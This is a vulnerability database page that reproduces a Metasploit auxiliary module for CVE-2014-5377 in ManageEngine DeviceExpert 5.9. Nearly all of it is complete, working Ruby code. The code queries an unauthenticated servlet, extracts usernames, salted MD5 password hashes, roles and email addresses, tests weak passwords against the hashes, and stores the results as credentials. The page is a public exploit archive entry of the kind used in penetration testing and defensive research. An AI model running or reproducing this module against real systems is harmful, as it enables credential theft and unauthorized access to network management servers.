Vulners
Lucene search
ManageEngine DeviceExpert User Credentials
🗓️ 01 Sep 2024 00:00:00Reported by Brendan Coles, Pedro Ribeiro, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 185 Views
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | ManageEngine DeviceExpert 5.9 - User Credential Disclosure | 28 Aug 201400:00 | – | zdt |
 | CVE-2014-5377 | 29 May 201815:50 | – | circl |
 | CVE-2014-5377 | 4 Sep 201417:00 | – | cve |
 | CVE-2014-5377 | 4 Sep 201417:00 | – | cvelist |
 | ManageEngine DeviceExpert 5.9 - User Credential Disclosure | 28 Aug 201400:00 | – | exploitdb |
 | ManageEngine DeviceExpert 5.9 - User Credential Disclosure | 28 Aug 201400:00 | – | exploitpack |
 | ManageEngine DeviceExpert Unauthorized Information Disclosure | 4 Sep 201400:00 | – | nessus |
 | ManageEngine DeviceExpert User Credentials | 18 Sep 201419:18 | – | metasploit |
 | CVE-2014-5377 | 4 Sep 201417:55 | – | nvd |
 | ManageEngine DeviceExpert User Credentials Information Disclosure Vulnerability | 9 Sep 201400:00 | – | openvas |
10
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(
info,
'Name' => 'ManageEngine DeviceExpert User Credentials',
'Description' => %q{
This module extracts usernames and salted MD5 password hashes
from ManageEngine DeviceExpert version 5.9 build 5980 and prior.
This module has been tested successfully on DeviceExpert
version 5.9.7 build 5970.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Pedro Ribeiro <pedrib[at]gmail.com>', # Discovery and exploit
'bcoles' # metasploit module
],
'References' =>
[
['EDB', '34449'],
['OSVDB', '110522'],
['CVE', '2014-5377']
],
'DisclosureDate' => '2014-08-28'))
register_options(
[
Opt::RPORT(6060),
OptBool.new('SSL', [true, 'Use SSL', true])
])
end
def check
get_users ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Safe
end
def get_users
users = nil
vprint_status("Reading users from master...")
res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'ReadUsersFromMasterServlet'))
if !res
vprint_error("Connection failed")
elsif res.code == 404
vprint_error("Could not find 'ReadUsersFromMasterServlet'")
elsif res.code == 200 && res.body =~ /<discoverydata>(.+)<\/discoverydata>/
users = res.body.scan(/<discoverydata>(.*?)<\/discoverydata>/)
vprint_good("Found #{users.length} users")
else
vprint_error("Could not find any users")
end
users
end
def parse_user_data(user)
return if user.nil?
username = user.scan(/<username>([^<]+)</).flatten.first
encoded_hash = user.scan(/<password>([^<]+)</).flatten.first
role = user.scan(/<userrole>([^<]+)</).flatten.first
mail = user.scan(/<emailid>([^<]+)</).flatten.first
salt = user.scan(/<saltvalue>([^<]+)</).flatten.first
hash = Rex::Text.decode_base64(encoded_hash).unpack('H*').flatten.first
pass = nil
['12345', 'admin', 'password', username].each do |weak_password|
if hash == Rex::Text.md5(weak_password + salt)
pass = weak_password
break
end
end
[username, pass, hash, role, mail, salt]
end
def run_host(ip)
users = get_users
return if users.nil?
service_data = {
address: rhost,
port: rport,
service_name: (ssl ? 'https' : 'http'),
protocol: 'tcp',
workspace_id: myworkspace_id
}
cred_table = Rex::Text::Table.new(
'Header' => 'ManageEngine DeviceExpert User Credentials',
'Indent' => 1,
'Columns' =>
[
'Username',
'Password',
'Password Hash',
'Role',
'E-mail',
'Password Salt'
]
)
vprint_status("Parsing user data...")
users.each do |user|
record = parse_user_data(user.to_s)
next if record.join.empty?
user = record[0]
pass = record[1]
hash = record[2]
role = record[3]
mail = record[4]
salt = record[5]
cred_table << [user, pass, hash, role, mail, salt]
if pass
print_good("Found weak credentials (#{user}:#{pass})")
credential_data = {
origin_type: :service,
module_fullname: self.fullname,
private_type: :password,
private_data: pass,
username: user
}
else
credential_data = {
origin_type: :service,
module_fullname: self.fullname,
private_type: :nonreplayable_hash,
private_data: "#{salt}:#{hash}",
username: user
}
end
credential_data.merge!(service_data)
credential_core = create_credential(credential_data)
login_data = {
core: credential_core,
access_level: role,
status: Metasploit::Model::Login::Status::UNTRIED
}
login_data.merge!(service_data)
create_credential_login(login_data)
end
print_line
print_line("#{cred_table}")
loot_name = 'manageengine.deviceexpert.user.creds'
loot_type = 'text/csv'
loot_filename = 'manageengine_deviceexpert_user_creds.csv'
loot_desc = 'ManageEngine DeviceExpert User Credentials'
p = store_loot(
loot_name,
loot_type,
rhost,
cred_table.to_csv,
loot_filename,
loot_desc)
print_status "Credentials saved in: #{p}"
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Sep 2024 00:00Current
7High risk
Vulners AI Score7
CVSS 25
EPSS0.67644